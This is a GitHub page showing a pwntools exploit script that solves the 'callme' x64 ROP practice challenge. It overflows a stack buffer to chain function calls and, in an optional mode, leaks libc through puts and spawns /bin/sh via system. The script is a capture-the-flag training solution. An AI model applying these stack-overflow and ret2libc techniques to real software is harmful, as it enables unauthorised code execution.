-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy path3_callme_x64.py
More file actions
executable file
·56 lines (48 loc) · 1.46 KB
/
Copy path3_callme_x64.py
File metadata and controls
executable file
·56 lines (48 loc) · 1.46 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
from pwn import *
elf = ELF("callme")
context.binary = elf
context.terminal = ['konsole', '-e']
context.log_level = logging.INFO
gdbscript = '''
set follow-fork-mode parent
break *pwnme+0x59
continue
'''
def connection():
if args.GDB:
c = gdb.debug([elf.path], gdbscript=gdbscript)
else:
c = process([elf.path])
return c
BUFFER_SIZE = 32
READ_SIZE = 512
def main():
rop = ROP(elf)
rop.raw(rop.generatePadding(0, BUFFER_SIZE + context.bytes))
if args.SHELL:
rop.puts(elf.got.puts)
rop.main()
else:
[rop.call(address, (0xdeadbeefdeadbeef, 0xcafebabecafebabe, 0xd00df00dd00df00d)) for address in [elf.plt.callme_one, elf.plt.callme_two, elf.plt.callme_three]]
payload = rop.chain()
assert len(payload) <= READ_SIZE
c = connection()
c.sendafter(b'> ', payload)
if args.SHELL:
c.recvline()
puts = unpack(c.recvline(drop=True).ljust(context.bytes, b'\0'))
libc = elf.libc
libc.address = puts - libc.symbols.puts
rop = ROP(libc)
rop.raw(rop.generatePadding(0, BUFFER_SIZE + context.bytes))
rop.raw(rop.ret.address)
rop.system(next(libc.search(b'/bin/sh\0')))
payload = rop.chain()
assert len(payload) <= READ_SIZE
c.sendafter(b'> ', payload)
c.recvline()
c.interactive()
else:
print(c.recvregex(rb'ROPE{.*}', capture=True).group().strip().decode())
if __name__ == '__main__':
main()